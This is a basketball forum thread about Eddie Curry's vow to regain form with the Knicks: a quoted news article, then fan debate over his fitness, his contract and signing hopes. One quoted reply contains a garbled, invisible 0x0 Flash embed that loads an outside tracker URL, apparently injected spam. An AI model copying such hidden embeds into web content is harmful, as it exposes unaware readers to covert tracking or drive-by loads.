Page 1 of 3 123 LastLast

Thread: Curry Vows To Dominate

Default Curry Vows To Dominate

[Only registered and activated users can see links. ]

<DL class=byline>BY ALAN HAHN | [Only registered and activated users can see links. ] </DL>
    LAS VEGAS - [Only registered and activated users can see links. ] had sweat glistening off his forehead as he sprinted down the floor with a swift bounce. He cut, spun and caught a well-placed alley-oop from rookie Toney Douglas for a dunk that a few months ago would have been almost impossible for him to complete.

But yesterday, in a practice here with [Only registered and activated users can see links. ]' summer league team at Valley High School, the 6-11 Curry looked as if he was back to form after a season in which he was only able to play a total of 12 minutes in two games because of weight, conditioning and knee issues.

After the workout, Curry spoke about his determination to get his game back.

"I really want to dominate," he said, "and show the New York fans and the organization what they brought me here for."

"I don't feel like my career is in jeopardy or anything like that," Curry said. "I'm not at any crossroads. For myself, I want to make the best of this situation. I want to salvage these last two years."

"I'm going to be ready, no matter what," he said. "Whether it's here or wherever."

==========

Have to say- Eddie Curry is the difference-maker for the NY Knicks. Both this year and next.

1- He can play well enough to help us reach the playoffs in 2009.
    2- He can play so well that it actually helps Lebron make the jump to NY.
    3- He plays well enough where we can trade him this year

I would LOVE for Curry to get his life back together. Become a presence in the paint.... Be a BIG horse....

Wade
    Chandler
    Lebron
    Galineri
    Curry

With Harrington, Darko, Douglas, Hill.

If Curry gets back to form this year.... and Danilo & Hill show promise.... How could Lebron turn that down to play with those old farts in CLE?

i hope this is the real deal

I'm glad he is trying to turn it around, but hopefully for the right reasons to save his life. This guy has a bad heart condition, and if he doesn't take care of himself it could be fatal. Last season was by far the worst season an athlete has to to endure losing so many things. His pride, his child, former companion, his allies.

I'll be rooting for you, but for you to get your life together the right way. I'll not be rooting for you to have a huge season to then go back to your old self and destroy it. Eddie has to regain confidence in himself but also in the eyes of his peers and the fans. He has to do it for New York, he freaking owes it to us by not showing up the last two seasons in the basketball court.

Wade
    Chandler
    Lebron
    Galineri
    Curry

With Harrington, Darko, Douglas, Hill.

If Curry gets back to form this year.... and Danilo & Hill show promise.... How could Lebron turn that down to play with those old farts in CLE?
    Please, stop dreaming. I mean seriously. How could that ever possibly happen. For the umpteenth time: We can NOT sign both Wade & James in the same season because we CAN NOT afford it. Especially with Curry.

Jesus!

And that 5 is so jumbled with 3 SFs playing through 2-4 & a 2 guard at the point. So, Wade brings up the ball in the 7 second offense, passes to James who drives and kicks to Wade for 3? Next play vice versa? The occasional alley oop for kicks?

Pippen + Jordan will never be duplicated. Bryant + Artest will be better than Wade + James, because Artest doesn't need the ball as much for his team to win. Kobe does. The Lakers need it too & so does Gasol.

Why would you take 2 prolific scorers at the 1 & the 3 and throw Curry in? And where is Lee?

10 points for optimism which is all good, but 0 points for a realistic scenario.

Brooklyn N.Y.........Alexandria,Egypt in the blood

call me crazy, but i think he's going to do this, i want him to succeed and hope he does, cause it will only help us

Veteran

Originally Posted by Crazy8s
    Please, stop dreaming. I mean seriously. How could that ever possibly happen. For the umpteenth time: We can NOT sign both Wade & James in the same season because we CAN NOT afford it. Especially with Curry.
    o.
    we can def afford to sign both wade and james... there is something called the salary cap which will not allow us to...

My god one can only hope...

I hope he plays so well that The Rockets or some other teams actually take a look at him. I don't believe his head is in the game, or will be for an entire season. He is not worth the money....

Originally Posted by bboycustom92
    i hope this is the real deal<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="[Only registered and activated users can see links. ]" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
    Me too, the guy has all the tools..lets hope he can deliver..

River Rocks, Port Rich (Rio Piedras, Puerto Rico PUNETA!!!)

I just dont see it happening. This guy is not fully committed longer term.

But, any hype about Curry is welcome if it helps us get rid of his lazy azz and ****ty contract.

Im really hoping he can show enough to help us land either Josh Smith, Bosh or Boozer.

Phase I ( get back in decent shape) : Complete
    Phase II (show up to summer league practice) : Complete
    Phase III ( become a starter again):
    Phase IV ( dominate the paint):
    Phase V ( be consistent):

2/5 so far, let's see what happens. Gotta give him the benefit of the doubt.

put him on the floor with darko.hill and lee's game conflicts with his.the mission is to get him burn and get his ass the **** outta here as soon as possible.

I can't get too excited about a "workout" I mean I'm glad that he's shed 30 lbs and all but workouts only tell you about a players conditioning and jumpshot (if they have one). I'd be more impressed if he were out there with the hungry guys playing in the summer league.

Back to form in a workout???? Nah that's not very telling. If he were to dominate the summer league then that's a more realisitic indication. Just my opinion.

First things first, can we get an updated shot of him!

eh, this is because his house got taken away by the government and he needs cash